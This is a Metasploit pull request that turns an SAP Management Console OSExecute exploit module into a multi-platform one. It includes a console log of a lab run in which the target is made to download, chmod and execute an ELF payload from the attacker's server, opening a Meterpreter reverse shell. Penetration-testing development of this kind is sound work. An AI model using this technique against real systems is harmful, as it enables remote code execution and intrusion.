
Convert sap_mgmt_con_osexec_payload to multi platform #1819

Merged
merged 2 commits into from
May 14, 2013

Conversation

jvazquez-r7
Contributor

This module converts modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb into a multi-platform exploit by adding a new Linux Target.

Remote platform auto detection is possible with the GetEnvironment operation. I've not been able to add an Automatic target cleanly atm because of the following:

  • The module uses the Msf::Exploit::Remote::HttpServer mixin.
  • The mixin above redefines regenerate_payload, in order to use it for new clients, which isn't the purpose here.
  • Tried to call generate_single_payload from Exploit directly, but had no success atm.

Because of the above, the autotarget is at this moment limited to a check of the remote platform, and warns the user if the selected target doesn't fit the auto detection (letting them run the exploit anyway; since auto detection could fail, I don't want to stop the user from their intended exploit action).

  • Result:
msf exploit(sap_mgmt_con_osexec_payload) > check
[+] The target is vulnerable.
msf exploit(sap_mgmt_con_osexec_payload) > rexploit
[*] Reloading module...
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.179:50013 - Auto Detecting Remote Platform...
msf exploit(sap_mgmt_con_osexec_payload) > [+] 192.168.172.179:50013 - Linux successfully detected...
[*] 192.168.172.179:50013 - Starting up our web service on http://192.168.172.1:8080/ihWAhKHiZSvZm ...
[*] Using URL: http://0.0.0.0:8080/ihWAhKHiZSvZm
[*]  Local IP: http://192.168.0.6:8080/ihWAhKHiZSvZm
[*] 192.168.172.179:50013 - Asking the SAP Management Console to download http://192.168.172.1:8080/ihWAhKHiZSvZm
[*] 192.168.172.179:50013 - Sending the payload to the server...
[*] 192.168.172.179:50013 - Waiting for the victim to request the ELF payload...
[*] 192.168.172.179:50013 - Asking the SAP Management Console to chmod /tmp/nhmpnemk
[*] 192.168.172.179:50013 - Asking the SAP Management Console to execute /tmp/nhmpnemk
[*] Transmitting intermediate stager for over-sized stage...(100 bytes)
[*] Sending stage (1126400 bytes) to 192.168.172.179
[*] Meterpreter session 6 opened (192.168.172.1:4444 -> 192.168.172.179:50240) at 2013-05-12 08:29:45 -0500
[+] Deleted /tmp/nhmpnemk

  • On the other hand, this pull request also deprecates the original module modules/exploits/windows/http/sap_mgmt_con_osexec_payload.rb rather than deleting it, until a reasonable time has passed, since people may actually be using the current module and we don't want to break the user experience :)
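The warn-but-don't-block autotarget logic described above, written out as an added example (not code from this pull request or from the Metasploit module): it parses a constructed GetEnvironment-style SOAP body, infers the platform from the environment variables, and compares it with the target the operator selected. The `<item>NAME=VALUE</item>` layout, the variable names used as hints, and all function names are assumptions.

```ruby
# Constructed sample of a GetEnvironment SOAP response body (format assumed,
# not taken from the page): every environment variable is returned as an <item>.
SAMPLE_LINUX_RESPONSE = <<~XML
  <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/">
    <SOAP-ENV:Body>
      <SAPControl:GetEnvironmentResponse xmlns:SAPControl="urn:SAPControl">
        <env>
          <item>HOME=/home/sapadm</item>
          <item>PATH=/usr/local/bin:/usr/bin:/bin</item>
          <item>SHELL=/bin/sh</item>
        </env>
      </SAPControl:GetEnvironmentResponse>
    </SOAP-ENV:Body>
  </SOAP-ENV:Envelope>
XML

# Second constructed sample standing in for a Windows host.
SAMPLE_WINDOWS_RESPONSE = <<~XML
  <env><item>SystemRoot=C:\\Windows</item><item>ComSpec=C:\\Windows\\system32\\cmd.exe</item></env>
XML

# Turn the <item>NAME=VALUE</item> entries into a Hash; values may contain '='.
def parse_environment(body)
  body.scan(%r{<item>([^<]*)</item>}).flatten.each_with_object({}) do |pair, env|
    name, value = pair.split('=', 2)
    env[name] = value.to_s
  end
end

# Heuristic platform guess: Windows-only variables win, then a POSIX-looking
# SHELL or PATH; anything else is :unknown so the caller can still proceed.
def detect_platform(env)
  keys = env.keys.map(&:downcase)
  return :windows if (keys & %w[windir systemroot comspec]).any?
  return :linux if env['SHELL'].to_s.start_with?('/') || env['PATH'].to_s.start_with?('/')
  :unknown
end

# Mirror the PR's behaviour: report the detection, warn on a mismatch, and
# always let the operator continue (detection can be wrong).
def autotarget_notice(detected, selected)
  return { level: :good, proceed: true, message: "#{detected.capitalize} successfully detected..." } if detected == selected
  return { level: :warning, proceed: true, message: 'Unable to detect the remote platform, continuing with the selected target' } if detected == :unknown
  { level: :warning, proceed: true, message: "Detected #{detected.capitalize} but the selected target is #{selected.capitalize}, continuing anyway" }
end
```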

@wchen-r7 wchen-r7 merged commit ce594a3 into rapid7:master May 14, 2013
@jvazquez-r7 jvazquez-r7 deleted the sap_mgmt_con_osexec_payload_multi branch November 18, 2014 15:56